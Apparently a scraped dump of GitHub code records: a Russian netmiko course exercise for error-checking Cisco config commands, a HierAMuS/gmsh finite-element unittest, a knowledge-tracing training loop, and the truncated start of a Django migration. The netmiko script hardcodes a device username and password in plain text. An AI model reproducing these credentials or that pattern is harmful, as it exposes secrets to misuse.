"PySide2.QtCore.Qt.NoModifier", "line_number": 540, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 570, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QPoint", "line_number": 589, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMainWindow", "line_number": 592, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.MSWindowsFixedSizeDialogHint", "line_number": 595, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 595, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.WindowMaximizeButtonHint", "line_number": 595, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QStatusBar", "line_number": 598, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 605, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 605, "usage_type": "attribute"}]} +{"seq_id": "6910990946", "text": "# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nЗадание 24.2b\r\n\r\nСкопировать класс MyNetmiko из задания 24.2a.\r\n\r\nДополнить функционал метода send_config_set netmiko и добавить в него проверку\r\nна ошибки с помощью метода _check_error_in_command.\r\n\r\nМетод send_config_set должен отправлять команды по одной и проверять каждую на ошибки.\r\nЕсли при выполнении команд не обнаружены ошибки, метод send_config_set возвращает\r\nвывод команд.\r\n\r\nIn [2]: from task_24_2b import MyNetmiko\r\n\r\nIn [3]: r1 = MyNetmiko(**device_params)\r\n\r\nIn [4]: r1.send_config_set('lo')\r\n---------------------------------------------------------------------------\r\nErrorInCommand Traceback (most recent call last)\r\n in ()\r\n----> 1 r1.send_config_set('lo')\r\n\r\n...\r\nErrorInCommand: При выполнении команды \"lo\" на устройстве 192.168.100.1 возникла ошибка \"Incomplete command.\"\r\n\r\n\"\"\"\r\nfrom netmiko.cisco.cisco_ios import CiscoIosSSH\r\nimport re\r\n\r\nclass ErrorInCommand(Exception):\r\n \"\"\"\r\n Исключение генерируется, если при выполнении команды на оборудовании, возникла ошибка.\r\n \"\"\"\r\n\r\nclass MyNetmiko(CiscoIosSSH):\r\n def __init__(self, **device_params):\r\n super().__init__(**device_params)\r\n self.enable()\r\n\r\n def _check_error_in_command(self, command, result):\r\n error_message = 'Команда \\\"{cmd}\\\" выполнилась с ошибкой \\\"{error}\\\" на устройстве \\\"{ip}\\\"'\r\n regex = \"% (?P.+)\"\r\n error_in_result = re.search(regex, result)\r\n if error_in_result:\r\n raise ErrorInCommand(\r\n error_message.format(\r\n cmd=command, ip = self.host, error=error_in_result.group(\"errmsg\")\r\n )\r\n )\r\n\r\n def send_command(self, command, *args, **kwargs):\r\n output = super().send_command(command)\r\n self._check_error_in_command(command, output)\r\n return output\r\n\r\n def send_config_set(self, **kwargs):\r\n if type(kwargs['config_commands']) != list:\r\n make_list = kwargs['config_commands']\r\n kwargs['config_commands'] = [make_list]\r\n for command in kwargs['config_commands']:\r\n output = super().send_config_set(command)\r\n error = self._check_error_in_command(command, output)\r\n if error:\r\n break\r\n else:\r\n print(output)\r\n\r\nif __name__ == \"__main__\":\r\n device_params = {\r\n \"device_type\": \"cisco_ios\",\r\n \"ip\": \"172.17.20.41\",\r\n \"username\": \"ivankurop\",\r\n \"password\": \"qweszxc\",\r\n \"secret\": \"qweszxc\",\r\n }\r\n r1 = MyNetmiko(**device_params)\r\n #print(r1.send_command('sh sh'))\r\n r1.send_config_set(config_commands=['ntp logging', 'ntp serGer 10.0.0.3'], strip_command=False)", "repo_name": "ivan-kuropiatnyk/python-course-natenka", "sub_path": "page632_24-OOP-Inheritance-My/page637_task_24_2b_My.py", "file_name": "page637_task_24_2b_My.py", "file_ext": "py", "file_size_in_byte": 3158, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "netmiko.cisco.cisco_ios.CiscoIosSSH", "line_number": 37, "usage_type": "name"}, {"api_name": "re.search", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "40322813762", "text": "import os, sys\nimport HierAMuS\nimport gmsh\nimport unittest\n\ndef firstModel(order,meshid,solver):\n pathname = os.path.dirname(sys.argv[0])\n currPath = os.path.abspath(pathname)\n \n L = 10\n h = 1\n h1 = 1\n nx = 2\n ny = 3\n\n gmsh.initialize()\n gmsh.option.setNumber('General.Terminal', 0)\n\n gmsh.model.add('CantileverBeam')\n \n p1=gmsh.model.occ.addPoint(0,0,0)\n p2=gmsh.model.occ.addPoint(L/2,0,0)\n p3=gmsh.model.occ.addPoint(L/2,h,0)\n p4=gmsh.model.occ.addPoint(0,h,0)\n \n \n p5=gmsh.model.occ.addPoint(L/2,0,0)\n p6=gmsh.model.occ.addPoint(L,0,0)\n p7=gmsh.model.occ.addPoint(L,h,0)\n p8=gmsh.model.occ.addPoint(L/2,h,0)\n \n l1=gmsh.model.occ.addLine(p1,p2)\n l2=gmsh.model.occ.addLine(p2,p3)\n l3=gmsh.model.occ.addLine(p3,p4)\n l4=gmsh.model.occ.addLine(p4,p1)\n \n l5=gmsh.model.occ.addLine(p5,p6)\n l6=gmsh.model.occ.addLine(p6,p7)\n l7=gmsh.model.occ.addLine(p7,p8)\n l8=gmsh.model.occ.addLine(p8,p5)\n \n cl1=gmsh.model.occ.addCurveLoop([l1,l2,l3,l4])\n f1=gmsh.model.occ.addPlaneSurface([cl1])\n cl2=gmsh.model.occ.addCurveLoop([l5,l6,l7,l8])\n f2=gmsh.model.occ.addPlaneSurface([cl2])\n\n gmsh.model.occ.synchronize()\n \n gmsh.model.mesh.setTransfiniteCurve(l1,nx+1)\n gmsh.model.mesh.setTransfiniteCurve(l3,nx+1)\n gmsh.model.mesh.setTransfiniteCurve(l2,ny+1)\n gmsh.model.mesh.setTransfiniteCurve(l4,ny+1)\n gmsh.model.mesh.setTransfiniteSurface(f1)\n \n gmsh.model.mesh.setTransfiniteCurve(l5,nx+1)\n gmsh.model.mesh.setTransfiniteCurve(l7,nx+1)\n gmsh.model.mesh.setTransfiniteCurve(l6,ny+1)\n gmsh.model.mesh.setTransfiniteCurve(l8,ny+1)\n gmsh.model.mesh.setTransfiniteSurface(f2)\n \n \n gmsh.option.setNumber(\"Mesh.RecombineAll\", 1)\n gmsh.model.mesh.generate(4)\n \n\n\n fesys = HierAMuS.FEMPy(currPath, 'firsttest')\n fesys.getMacroCommands().setLogLevel(fesys.NoLog(),fesys.NoLog())\n fesys.setStaticSolutionState()\n fesys.setSolver(solver)\n \n geo = fesys.getMeshCommands().getGeometryCommands()\n \n fromGM = fesys.getMeshCommands().getFromGMESH()\n fromGM.addGeomFromGmsh(gmsh)\n geo.checkGeometry()\n \n # Adding Element\n fromGM.addFaceElements(gmsh,[f1,f2],1)\n \n # Element definition\n fesys.getMeshCommands().getMaterialFormulations().addMA3_2D_LinearElastic_Isotrop(1,E=100,nu=0.3,thickness=1,plainstrain=0)\n fesys.getMeshCommands().getElementFormulations().addEL201_2DShell(num=1,meshiddisp=meshid,disporder=order,mode=1)\n fesys.getMeshCommands().addMaterial(1,matFormNum=1,elemFormNum=1)\n\n fesys.getMeshCommands().setDegreesOfFreedom()\n \n \n \n # Boundary Conditions\n edgeList = fromGM.getEdgeNumbers(gmsh,l4,1)\n fesys.getMeshCommands().getBoundaryConditions().BC(eltype=geo.edgeType(),number=edgeList,meshId=1,dofs=[1,1,1],shapeOrder=order)\n\n masterEdges = fromGM.getEdgeNumbers(gmsh,l2,1)\n slaveEdges = fromGM.getEdgeNumbers(gmsh,l8,1)\n a=[1,2,3]\n a.reverse()\n slaveEdges.reverse()\n \n\n fesys.getMeshCommands().getConstraintCommands().generalLink(geo.edgeType(),masterEdges,slaveEdges,1,order,0,0,1,1)\n fesys.getMeshCommands().getConstraintCommands().generalLink(geo.edgeType(),masterEdges,slaveEdges,1,order,1,1,1.0,1.0)\n\n loadEdges = fromGM.getEdgeNumbers(gmsh,l6,1)\n fesys.getMeshCommands().getBoundaryConditions().load(geo.edgeType(),loadEdges,1,[0,1,0],0)\n\n fesys.getMacroCommands().sparseSetUp()\n\n fesys.getMacroCommands().setPropFunction(number=0)\n fesys.getMacroCommands().setDt(1)\n fesys.getMacroCommands().timeincr()\n\n fesys.getMacroCommands().newton(refResidual=1e-11)\n \n sol = fesys.getMacroCommands().getSolution(fesys.getMeshCommands().getGeometryCommands().vertexType(),geomNumber=p6,meshId=meshid)\n\n \n return sol\n\n\nclass TestConstraint2D(unittest.TestCase):\n def __init__(self, methodName: str = \"Constraint2D\"):\n self.places=8\n super().__init__(methodName)\n \n def test_const1(self):\n sol=firstModel(1,1,1)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 1\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 1\")\n def test_const2(self):\n sol=firstModel(1,1,2)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 2\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 2\")\n def test_const3(self):\n sol=firstModel(1,1,3)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 3\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 3\")\n def test_const4(self):\n sol=firstModel(1,1,4)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 4\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 4\")\n def test_const5(self):\n sol=firstModel(1,1,5)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 5\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 5\")\n def test_const6(self):\n sol=firstModel(1,1,6)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 6\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 6\")\n\n", "repo_name": "sklarmann/HierAMuS", "sub_path": "Tests/python/twoD/constraint/constrainttest.py", "file_name": "constrainttest.py", "file_ext": "py", "file_size_in_byte": 5621, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "gmsh.initialize", "line_number": 16, "usage_type": "call"}, {"api_name": "gmsh.option.setNumber", "line_number": 17, "usage_type": "call"}, {"api_name": "gmsh.option", "line_number": 17, "usage_type": "attribute"}, {"api_name": "gmsh.model.add", "line_number": 19, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 19, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 21, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 21, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 22, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 22, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 23, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 23, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 24, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 24, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 27, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 27, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 28, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 28, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 29, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 29, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 30, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 30, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 32, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 32, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 33, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 33, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 34, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 34, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 35, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 35, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 37, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 37, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 38, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 38, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 39, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 39, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 40, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 40, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addCurveLoop", "line_number": 42, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 42, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPlaneSurface", "line_number": 43, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addCurveLoop", "line_number": 44, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPlaneSurface", "line_number": 45, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.synchronize", "line_number": 47, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 47, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 49, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 49, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 50, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 50, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 51, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 51, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 52, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteSurface", "line_number": 53, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 53, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 55, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 55, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 56, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 56, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 57, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 57, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 58, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 58, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteSurface", "line_number": 59, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 59, "usage_type": "attribute"}, {"api_name": "gmsh.option.setNumber", "line_number": 62, "usage_type": "call"}, {"api_name": "gmsh.option", "line_number": 62, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.generate", "line_number": 63, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 63, "usage_type": "attribute"}, {"api_name": "HierAMuS.FEMPy", "line_number": 67, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 121, "usage_type": "attribute"}]} +{"seq_id": "8307039013", "text": "import os, sys\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import one_hot, binary_cross_entropy\nimport numpy as np\nfrom .evaluate_model import evaluate\nfrom torch.autograd import Variable, grad\nfrom .atkt import _l2_normalize_adv\nfrom ..utils.utils import debug_print\nfrom IPython import embed\nfrom .emb import EMB\nfrom torch.optim import SGD, Adam\n\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef cal_loss(model, ys, r, rshft, sm, preloss=[]):\n model_name = model.model_name\n\n if model_name in [\"dkt\", \"dkt_forget\", \"dkvmn\", \"kqn\", \"sakt\", \"saint\", \"atkt\", \"atktfix\", \"gkt\"]:\n\n y = torch.masked_select(ys[0], sm)\n t = torch.masked_select(rshft, sm)\n loss = binary_cross_entropy(y, t)\n elif model_name == \"dkt+\":\n y_curr = torch.masked_select(ys[1], sm)\n y_next = torch.masked_select(ys[0], sm)\n r_curr = torch.masked_select(r, sm)\n r_next = torch.masked_select(rshft, sm)\n loss = binary_cross_entropy(y_next, r_next)\n\n loss_r = binary_cross_entropy(y_curr, r_curr) # if answered wrong for C in t-1, cur answer for C should be wrong too\n loss_w1 = torch.masked_select(torch.norm(ys[2][:, 1:] - ys[2][:, :-1], p=1, dim=-1), sm[:, 1:])\n loss_w1 = loss_w1.mean() / model.num_c\n loss_w2 = torch.masked_select(torch.norm(ys[2][:, 1:] - ys[2][:, :-1], p=2, dim=-1) ** 2, sm[:, 1:])\n loss_w2 = loss_w2.mean() / model.num_c\n\n loss = loss + model.lambda_r * loss_r + model.lambda_w1 * loss_w1 + model.lambda_w2 * loss_w2\n elif model_name == \"akt\":\n y = torch.masked_select(ys[0], sm)\n t = torch.masked_select(rshft, sm)\n loss = binary_cross_entropy(y, t) + preloss[0]\n\n return loss\n\n\ndef model_forward(device, model, dataset_name, data):\n model_name = model.model_name\n emb_type = model.emb_type\n if model_name in [\"dkt_forget\"]:\n q, c, r, qshft, cshft, rshft, m, sm, d, dshft = data\n elif model_name in [\"saint\", \"akt\"] or dataset_name in [\"assist2015\"]:\n q, c, r, qshft, cshft, rshft, m, sm, q_diff, c_diff = data\n else: \n c, q, r, cshft, qshft, rshft, m, sm, c_diff, q_diff = data\n\n ys, preloss = [], []\n cq = torch.cat((q[:,0:1], qshft), dim=1)\n cc = torch.cat((c[:,0:1], cshft), dim=1)\n cr = torch.cat((r[:,0:1], rshft), dim=1)\n mm = torch.cat([torch.ones((m.shape[0], 1), dtype=torch.bool).to(device), m], dim=1)\n\n if model_name in [\"dkt\"]:\n y = model(c_diff[:,:-1].long(), c.long(), r.long(), cshft.long())\n # y = (y * one_hot(cshft.long(), model.num_c)).sum(-1)\n ys.append(y) # first: yshft\n elif model_name == \"dkt+\":\n y = model(c.long(), r.long())\n y_next = (y * one_hot(cshft.long(), model.num_c)).sum(-1)\n y_curr = (y * one_hot(c.long(), model.num_c)).sum(-1)\n ys = [y_next, y_curr, y]\n elif model_name in [\"dkt_forget\"]:\n y = model(c.long(), r.long(), d, dshft)\n y = (y * one_hot(cshft.long(), model.num_c)).sum(-1)\n ys.append(y)\n elif model_name in [\"dkvmn\"]:\n y = model(cc.long(), cr.long(), c_diff.long())\n ys.append(y[:,1:])\n elif model_name in [\"kqn\", \"sakt\"]:\n y = model(c_diff[:,:-1].long(), c.long(), r.long(), cshft.long())\n ys.append(y)\n elif model_name in [\"saint\"]:\n y = model(c_diff[:,:-1].long(), cq.long(), cc.long(), r.long())\n ys.append(y[:, 1:])\n elif model_name == \"akt\": \n y, reg_loss = model(c_diff.long(), cc.long(), cr.long(), cq.long())\n ys.append(y[:,1:])\n preloss.append(reg_loss)\n elif model_name in [\"atkt\", \"atktfix\"]:\n y, features = model(c.long(), r.long())\n y = (y * one_hot(cshft.long(), model.num_c)).sum(-1)\n loss = cal_loss(model, [y], r, rshft, sm)\n # at\n features_grad = grad(loss, features, retain_graph=True)\n p_adv = torch.FloatTensor(model.epsilon * _l2_normalize_adv(features_grad[0].data))\n p_adv = Variable(p_adv).to(device)\n pred_res, _ = model(c.long(), r.long(), p_adv)\n # second loss\n pred_res = (pred_res * one_hot(cshft.long(), model.num_c)).sum(-1)\n adv_loss = cal_loss(model, [pred_res], r, rshft, sm)\n loss = loss + model.beta * adv_loss\n elif model_name == \"gkt\":\n y = model(cc.long(), cr.long())\n ys.append(y) \n elif model_name.startswith(\"emb\"):\n y = model(cc.long())\n \n # cal loss\n if model_name in [\"emb\"] or emb_type == \"qid_emb\": \n mse_loss = nn.MSELoss()\n if y.squeeze().shape[-1] == c_diff.shape[-1]:\n loss = mse_loss(torch.masked_select(y.squeeze(), mm), torch.masked_select(c_diff, mm))\n else : \n loss = mse_loss(torch.masked_select(y.squeeze(), m), torch.masked_select(c_diff[:,:-1], m))\n\n elif model_name not in [\"atkt\", \"atktfix\"]:\n loss = cal_loss(model, ys, r, rshft, sm, preloss)\n\n return loss\n \n\ndef train_model(device, fold, model, dataset_name, train_loader, valid_loader, num_epochs, opt, ckpt_path, early_stopping, test_loader=None, test_window_loader=None, save_model=False):\n max_auc, best_epoch, min_loss = 0, -1, 100\n train_step = 0\n\n for i in range(1, num_epochs + 1):\n loss_mean = []\n # print(\"model:\", model.state_dict()[\"interaction_emb.weight\"][0][:10])\n for data in train_loader:\n train_step+=1\n model.train()\n loss = model_forward(device, model, dataset_name, data)\n total_loss = loss\n if model.emb_type.startswith(\"qid_\"):\n lambda_ = float(model.emb_type.split(\"_\")[-1])\n assert lambda_ >= 0, \"set proper lambda\"\n bf_emb = model.emb_type\n model.emb_type = \"qid_emb\"\n loss2 = model_forward(device, model, dataset_name, data)\n total_loss = (1-lambda_)*loss + lambda_*loss2 \n model.emb_type = bf_emb\n opt.zero_grad()\n total_loss.backward()\n opt.step()\n\n loss_mean.append(total_loss.detach().cpu().numpy())\n if model.model_name == \"gkt\" and train_step%10==0:\n text = f\"Total train step is {train_step}, the loss is {total_loss.item():.5}\"\n debug_print(text = text,fuc_name=\"train_model\")\n\n\n loss_mean = np.mean(loss_mean)\n auc, acc, mse = evaluate(device, model, dataset_name, valid_loader, model.model_name)\n ### atkt 有diff, 以下代码导致的\n ### auc, acc = round(auc, 4), round(acc, 4)\n\n if model.model_name == \"emb\":\n if mse < min_loss:\n if save_model:\n torch.save(model.state_dict(), os.path.join(ckpt_path, model.emb_type+f\"_model_{fold}.ckpt\"))\n\n min_loss = mse\n best_epoch = i\n testauc, testacc = -1, -1\n window_testauc, window_testacc = -1, -1\n if not save_model:\n if test_loader != None:\n save_test_path = os.path.join(ckpt_path, model.emb_type+\"_test_predictions.txt\")\n testauc, testacc, test_mse = evaluate(device, model, dataset_name, test_loader, model.model_name, save_test_path)\n if test_window_loader != None:\n save_test_path = os.path.join(ckpt_path, model.emb_type+\"_test_window_predictions.txt\")\n window_testauc, window_testacc, window_testmse= evaluate(device, model, dataset_name, test_window_loader, model.model_name, save_test_path)\n testauc, testacc, window_testauc, window_testacc = round(testauc, 4), round(testacc, 4), round(window_testauc, 4), round(window_testacc, 4)\n # window_testauc, window_testacc = -1, -1\n validauc, validacc, validmse = round(auc, 4), round(acc, 4), round(mse, 4)#model.evaluate(valid_loader, emb_type)\n # trainauc, trainacc = model.evaluate(train_loader, emb_type)\n # max_auc = round(max_auc, 4)\n print(f\"Epoch: {i}, validmse: {validmse:.4f}, best epoch: {best_epoch:.4f}, best min_loss: {min_loss:.4f}, train loss: {loss_mean:.4f}\")\n # print(f\" testauc: {testauc}, testacc: {testacc}, window_testauc: {window_testauc}, window_testacc: {window_testacc}\")\n \n if i - best_epoch > early_stopping.patience: \n print(\"Early stopped...\")\n break\n\n else: \n if auc > max_auc:\n if save_model:\n torch.save(model.state_dict(), os.path.join(ckpt_path, model.emb_type+f\"_model_{fold}.ckpt\"))\n max_auc = auc\n best_epoch = i\n testauc, testacc = -1, -1\n window_testauc, window_testacc = -1, -1\n if not save_model:\n if test_loader != None:\n save_test_path = os.path.join(ckpt_path, model.emb_type+\"_test_predictions.txt\")\n testauc, testacc, _ = evaluate(device, model, dataset_name, test_loader, model.model_name, save_test_path)\n if test_window_loader != None:\n save_test_path = os.path.join(ckpt_path, model.emb_type+\"_test_window_predictions.txt\")\n window_testauc, window_testacc, _ = evaluate(device, model, dataset_name, test_window_loader, model.model_name, save_test_path)\n testauc, testacc, window_testauc, window_testacc = round(testauc, 4), round(testacc, 4), round(window_testauc, 4), round(window_testacc, 4)\n # window_testauc, window_testacc = -1, -1\n validauc, validacc, validmse = round(auc, 4), round(acc, 4), round(mse, 4)#model.evaluate(valid_loader, emb_type)\n # trainauc, trainacc = model.evaluate(train_loader, emb_type)\n max_auc = round(max_auc, 4)\n print(f\"Epoch: {i}, validauc: {validauc:.4f}, validacc: {validacc:.4f}, best epoch: {best_epoch:.4f}, best auc: {max_auc:.4f}, loss: {loss_mean:.4f}\")\n # print(f\" testauc: {testauc}, testacc: {testacc}, window_testauc: {window_testauc}, window_testacc: {window_testacc}\")\n \n early_stopping(auc, i)\n\n if early_stopping.early_stop:\n print(\"Early stopped...\")\n break\n\n return testauc, testacc, window_testauc, window_testacc, validauc, validacc, validmse, best_epoch", "repo_name": "skewondr/Kiise_22KCC", "sub_path": "pykt/models/train_model.py", "file_name": "train_model.py", "file_ext": "py", "file_size_in_byte": 10458, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.masked_select", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.bool", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.autograd.grad", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 94, "usage_type": "call"}, {"api_name": "atkt._l2_normalize_adv", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.masked_select", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.utils.debug_print", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 151, "usage_type": "call"}, {"api_name": "evaluate_model.evaluate", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "evaluate_model.evaluate", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "evaluate_model.evaluate", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "evaluate_model.evaluate", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "evaluate_model.evaluate", "line_number": 198, "usage_type": "call"}]} +{"seq_id": "39613213344", "text": "from django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n 